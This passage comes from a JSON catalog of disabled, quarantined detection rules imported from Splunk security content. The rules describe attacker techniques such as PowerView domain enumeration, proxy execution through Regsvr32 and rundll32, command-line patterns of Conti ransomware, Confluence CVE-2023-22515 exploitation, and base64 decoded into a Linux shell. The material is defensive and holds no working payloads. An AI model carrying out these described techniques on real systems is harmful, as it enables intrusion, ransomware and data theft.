This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-rmm-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61884b02-0dcf-44c5-9094-db33bac09fa6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_rmm_user_agent.yml" } }, { "id": "splunk-security-content-61994268-04f4-11ec-865c-acde48001122", "type": "detection", "name": "Get DomainUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainUser` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a tool often used for domain enumeration. The detection leverages PowerShell operational logs to identify instances where this command is executed. Monitoring this activity is crucial as it may indicate an adversary's attempt to gather information about domain users, which is a common step in Active Directory Discovery. 
If confirmed malicious, this activity could lead to further reconnaissance and potential exploitation of domain resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainuser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61994268-04f4-11ec-865c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainuser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-619eac6c-0f03-4699-ae29-5f337877bcf9", "type": "detection", "name": "Windows Chrome Auto-Update Disabled via Registry", "description": "The following analytic detects modifications to Windows registry values that disable Google Chrome auto-updates.\nChanges to values such as DisableAutoUpdateChecksCheckboxValue = 1, Update{8A69D345-D564-463C-AFF1-A69D9E530F96} = 0, UpdateDefault = 0, and AutoUpdateCheckPeriodMinutes = 0 can prevent Chrome from receiving security updates.\nThis behavior may indicate attempts to bypass update policies, maintain unauthorized extensions, or facilitate malware persistence.\nMonitoring these registry changes helps identify potential policy violations or malicious activity targeting browser security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-auto-update-disabled-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "619eac6c-0f03-4699-ae29-5f337877bcf9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_auto_update_disabled_via_registry.yml" } }, { "id": "splunk-security-content-61ae09c2-079e-44b1-8be0-74e35c5a679e", "type": "detection", "name": "Cisco Network Interface Modifications", "description": "This analytic detects the creation or modification of network interfaces on Cisco devices, which could indicate an attacker establishing persistence or preparing for lateral movement. After gaining initial access to network devices, threat actors like Static Tundra often create new interfaces (particularly loopback interfaces) to establish covert communication channels or maintain persistence. This detection specifically looks for the configuration of new interfaces, interface state changes, and the assignment of IP addresses to interfaces. 
These activities are particularly concerning when they involve unusual interface names or descriptions containing suspicious terms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556", "T1021", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-network-interface-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61ae09c2-079e-44b1-8be0-74e35c5a679e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_network_interface_modifications.yml" } }, { "id": "splunk-security-content-61e9a56a-20fa-11ec-8ba3-acde48001122", "type": "detection", "name": "Verclsid CLSID Execution", "description": "The following analytic detects the potential abuse of the verclsid.exe utility to execute malicious files via generated CLSIDs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns associated with verclsid.exe. This activity is significant because verclsid.exe is a legitimate Windows application used to verify CLSID COM objects, and its misuse can indicate an attempt to bypass security controls. 
If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise or further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/verclsid-clsid-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61e9a56a-20fa-11ec-8ba3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/verclsid_clsid_execution.yml" } }, { "id": "splunk-security-content-61f10919-c360-4e56-9cda-f1f34500cfda", "type": "detection", "name": "Windows RDP Server Registry Entry Created", "description": "This detection identifies the creation of registry keys under HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\, which occur when a user initiates a Remote Desktop Protocol (RDP) connection using the built-in Windows RDP client (mstsc.exe). These registry entries store information about previously connected remote hosts, including usernames and display settings. Their creation is a strong indicator that an outbound RDP session was initiated from the system. While the presence of these keys is normal during legitimate RDP use, their appearance can be used to track remote access activity, especially in environments where RDP is tightly controlled. In post-compromise scenarios, these artifacts may be created by threat actors using RDP for lateral movement or command-and-control. 
Monitoring the creation of these registry entries can help defenders detect initial use of RDP from a compromised host, particularly when correlated with unusual user behavior, logon patterns, or network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-server-registry-entry-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61f10919-c360-4e56-9cda-f1f34500cfda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_server_registry_entry_created.yml" } }, { "id": "splunk-security-content-622f08d0-69ef-42c2-8139-66088bc25acd", "type": "detection", "name": "Windows CAB File on Disk", "description": "The following analytic detects .cab files being written to disk. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on events where the file name is '*.cab' and the action is 'write'. This activity is significant as .cab files can be used to deliver malicious payloads, including embedded .url files that execute harmful code. If confirmed malicious, this behavior could lead to unauthorized code execution and potential system compromise. 
Analysts should review the file path and associated artifacts for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cab-file-on-disk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "622f08d0-69ef-42c2-8139-66088bc25acd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cab_file_on_disk.yml" } }, { "id": "splunk-security-content-624919bc-c382-11eb-adcc-acde48001122", "type": "detection", "name": "Conti Common Exec parameter", "description": "The following analytic detects the execution of suspicious command-line arguments commonly associated with Conti ransomware, specifically targeting local drives and network shares for encryption. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential ransomware attack, which can lead to widespread data encryption and operational disruption. 
If confirmed malicious, the impact could be severe, resulting in data loss, system downtime, and potential ransom demands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/conti-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "624919bc-c382-11eb-adcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/conti_common_exec_parameter.yml" } }, { "id": "splunk-security-content-62606c77-d53d-4182-9371-b02cdbbbcef7", "type": "detection", "name": "Windows Rapid Authentication On Multiple Hosts", "description": "The following analytic detects a source computer authenticating to 30 or more remote endpoints within a 5-minute timespan using Event ID 4624. This behavior is identified by analyzing Windows Event Logs for LogonType 3 events and counting unique target computers. Such activity is significant as it may indicate lateral movement or network share enumeration by an adversary. 
If confirmed malicious, this could lead to unauthorized access to multiple systems, potentially compromising sensitive data and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rapid-authentication-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62606c77-d53d-4182-9371-b02cdbbbcef7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rapid_authentication_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-62732736-6250-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious Regsvr32 Register Suspicious Path", "description": "The following analytic detects the use of Regsvr32.exe to register DLLs from suspicious paths such as AppData, ProgramData, or Windows Temp directories. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because Regsvr32.exe can be abused to proxy execution of malicious code, bypassing traditional security controls. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-regsvr32-register-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62732736-6250-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_regsvr32_register_suspicious_path.yml" } }, { "id": "splunk-security-content-628d9c7c-3242-43b5-9620-7234c080a726", "type": "detection", "name": "Windows Snake Malware Kernel Driver Comadmin", "description": "The following analytic detects the creation of the comadmin.dat file in the %windows%\\system32\\Com directory, which is associated with Snake Malware. This detection leverages the Endpoint.Filesystem data model to identify file creation events matching the specified path and filename. This activity is significant because the comadmin.dat file is part of Snake Malware's installation process, which includes dropping a kernel driver and a custom DLL. 
If confirmed malicious, this activity could allow an attacker to load a malicious driver, potentially leading to privilege escalation and persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-kernel-driver-comadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "628d9c7c-3242-43b5-9620-7234c080a726", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_kernel_driver_comadmin.yml" } }, { "id": "splunk-security-content-62f10052-d7b3-4e48-b57b-56f8e3ac7ceb", "type": "detection", "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell cmdlets. This detection leverages Azure AD SignInLogs to identify successful logins where the appDisplayName is \"Microsoft Azure PowerShell.\" This activity is significant because it is uncommon for regular, non-administrative users to authenticate using PowerShell, and it may indicate enumeration and discovery techniques by an attacker. 
If confirmed malicious, this activity could allow attackers to perform extensive reconnaissance, potentially leading to privilege escalation or further exploitation within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-powershell-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62f10052-d7b3-4e48-b57b-56f8e3ac7ceb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_powershell_authentication.yml" } }, { "id": "splunk-security-content-62fed254-513b-460e-953d-79771493a9f3", "type": "detection", "name": "Detect HTML Help Renamed", "description": "The following analytic detects instances where hh.exe (HTML Help) has been renamed and is executing a Compiled HTML Help (CHM) file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because attackers can use renamed hh.exe to execute malicious scripts embedded in CHM files, potentially leading to code execution. 
If confirmed malicious, this technique could allow attackers to run arbitrary scripts, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-renamed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "62fed254-513b-460e-953d-79771493a9f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_renamed.yml" } }, { "id": "splunk-security-content-630b1694-210a-48ee-a450-6f79e7679f2c", "type": "detection", "name": "Azure AD High Number Of Failed Authentications For User", "description": "The following analytic identifies an Azure AD account experiencing more than 20 failed authentication attempts within a 10-minute window. This detection leverages Azure SignInLogs data, specifically monitoring for error code 50126 and unsuccessful authentication attempts. This behavior is significant as it may indicate a brute force attack targeting the account. If confirmed malicious, an attacker could potentially gain unauthorized access, leading to data breaches or further exploitation within the environment. 
Security teams should adjust the threshold based on their specific environment to reduce false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "630b1694-210a-48ee-a450-6f79e7679f2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-630ea8b2-2800-4f5d-9cbc-d65c567349b0", "type": "detection", "name": "Confluence CVE-2023-22515 Trigger Vulnerability", "description": "The following analytic identifies potential exploitation attempts of the Confluence CVE-2023-22515 vulnerability. It detects successful accesses (HTTP status 200) to specific vulnerable endpoints by analyzing web logs within the Splunk 'Web' Data Model. This activity is significant for a SOC as it indicates possible privilege escalation attempts in Confluence. 
If confirmed malicious, attackers could gain unauthorized access or create accounts with escalated privileges, leading to potential data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-cve-2023-22515-trigger-vulnerability.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "630ea8b2-2800-4f5d-9cbc-d65c567349b0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_cve_2023_22515_trigger_vulnerability.yml" } }, { "id": "splunk-security-content-6338266a-ee2a-11eb-bf68-acde48001122", "type": "detection", "name": "Rundll32 Process Creating Exe Dll Files", "description": "The following analytic detects a rundll32 process creating executable (.exe) or dynamic link library (.dll) files. It leverages Sysmon EventCode 11 to identify instances where rundll32.exe generates these file types. This activity is significant because rundll32 is often exploited by malware, such as IcedID, to drop malicious payloads in directories like Temp, AppData, or ProgramData. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, establish persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-process-creating-exe-dll-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6338266a-ee2a-11eb-bf68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_process_creating_exe_dll_files.yml" } }, { "id": "splunk-security-content-635c26cc-0fd1-4098-8ec9-824bf9544b11", "type": "detection", "name": "ASL AWS SAML Update identity provider", "description": "The following analytic detects updates to the SAML provider in AWS. It leverages AWS CloudTrail logs to identify the `UpdateSAMLProvider` event, analyzing fields such as `sAMLProviderArn`, `sourceIPAddress`, and `userIdentity` details. Monitoring updates to the SAML provider is crucial as it may indicate a perimeter compromise of federated credentials or unauthorized backdoor access set by an attacker. 
If confirmed malicious, this activity could allow attackers to manipulate identity federation, potentially leading to unauthorized access to cloud resources and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-saml-update-identity-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "635c26cc-0fd1-4098-8ec9-824bf9544b11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_saml_update_identity_provider.yml" } }, { "id": "splunk-security-content-637557ec-ca08-11eb-bd0a-acde48001122", "type": "detection", "name": "Powershell Creating Thread Mutex", "description": "The following analytic detects the execution of PowerShell scripts using the `mutex` function via EventCode 4104. This detection leverages PowerShell Script Block Logging to identify scripts that create thread mutexes, a technique often used in obfuscated scripts to ensure only one instance runs on a compromised machine. This activity is significant as it may indicate the presence of sophisticated malware or persistence mechanisms. 
If confirmed malicious, the attacker could maintain exclusive control over a process, potentially leading to further exploitation or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-creating-thread-mutex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "637557ec-ca08-11eb-bd0a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_creating_thread_mutex.yml" } }, { "id": "splunk-security-content-637b603e-1799-40fd-bf87-47ecbd551b66", "type": "detection", "name": "Linux Decode Base64 to Shell", "description": "The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data. The detection is made by searching for specific commands in the Splunk query, namely \"base64 -d\" and \"base64 --decode\", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. 
It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, for data exfiltration, or perform other malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-decode-base64-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "637b603e-1799-40fd-bf87-47ecbd551b66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_decode_base64_to_shell.yml" } }, { "id": "splunk-security-content-63a2c15e-9448-43c5-a4a8-9852266aaada", "type": "detection", "name": "Windows App Layer Protocol Qakbot NamedPipe", "description": "The following analytic detects a suspicious process creating or connecting to a potential Qakbot named pipe. It leverages Sysmon EventCodes 17 and 18, focusing on specific processes known to be abused by Qakbot and identifying randomly generated named pipes in GUID form. This activity is significant as Qakbot malware uses named pipes for inter-process communication after code injection, facilitating data theft. 
If confirmed malicious, this behavior could indicate a Qakbot infection, leading to unauthorized data access and potential exfiltration from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-app-layer-protocol-qakbot-namedpipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a2c15e-9448-43c5-a4a8-9852266aaada", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_app_layer_protocol_qakbot_namedpipe.yml" } }, { "id": "splunk-security-content-63a449ae-9f04-11ec-945e-acde48001122", "type": "detection", "name": "Windows Disable Windows Group Policy Features Through Registry", "description": "The following analytic detects suspicious registry modifications aimed at disabling Windows Group Policy features. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values associated with disabling key Windows functionalities. This activity is significant because it is commonly used by ransomware to hinder mitigation and forensic response efforts. 
If confirmed malicious, this behavior could severely impair the ability of security teams to analyze and respond to the attack, allowing the attacker to maintain control and persist within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-windows-group-policy-features-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a449ae-9f04-11ec-945e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_windows_group_policy_features_through_registry.yml" } }, { "id": "splunk-security-content-63a8a537-36fd-4aac-a3ea-1a96afd2c871", "type": "detection", "name": "O365 DLP Rule Triggered", "description": "The following analytic detects when Microsoft Office 365 Data Loss Prevention (DLP) rules have been triggered. DLP rules can be configured for any number of security, regulatory, or business compliance reasons, as such this analytic will only be as accurate as the upstream DLP configuration. 
Detections from this analytic should be evaluated thoroughly to determine what, if any, security relevance the underlying DLP events contain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-dlp-rule-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63a8a537-36fd-4aac-a3ea-1a96afd2c871", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_dlp_rule_triggered.yml" } }, { "id": "splunk-security-content-63e3aff9-45d7-4d41-bcdb-9da561fb4533", "type": "detection", "name": "Cisco IOS Suspicious Privileged Account Creation", "description": "This analytic detects the creation of privileged user accounts on Cisco IOS devices, which could indicate an attacker establishing backdoor access. The detection focuses on identifying when user accounts are created with privilege level 15 (the highest administrative privilege level in Cisco IOS) or when existing accounts have their privileges elevated. This type of activity is particularly concerning when performed by unauthorized users or during unusual hours, as it may represent a key step in establishing persistence following the exploitation of vulnerabilities like CVE-2018-0171 in Cisco Smart Install. 
Threat actors like Static Tundra have been observed creating privileged accounts as part of their attack chain after gaining initial access to network devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-ios-suspicious-privileged-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "63e3aff9-45d7-4d41-bcdb-9da561fb4533", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_ios_suspicious_privileged_account_creation.yml" } }, { "id": "splunk-security-content-640b0eda-0429-11ec-accd-acde48001122", "type": "detection", "name": "GetWmiObject User Account with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` commandlet with the `Win32_UserAccount` parameter via PowerShell Script Block Logging (EventCode=4104). This method leverages script block text to identify when a list of all local users is being enumerated. This activity is significant as it may indicate an adversary or Red Team operation attempting to gather user information for situational awareness and Active Directory discovery. 
If confirmed malicious, this could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-user-account-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "640b0eda-0429-11ec-accd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_user_account_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-6410a403-36bb-490f-a06a-11c3be7d2a41", "type": "detection", "name": "Windows Modify Registry AuthenticationLevelOverride", "description": "The following analytic detects modifications to the Windows registry key \"AuthenticationLevelOverride\" within the Terminal Server Client settings. It leverages data from the 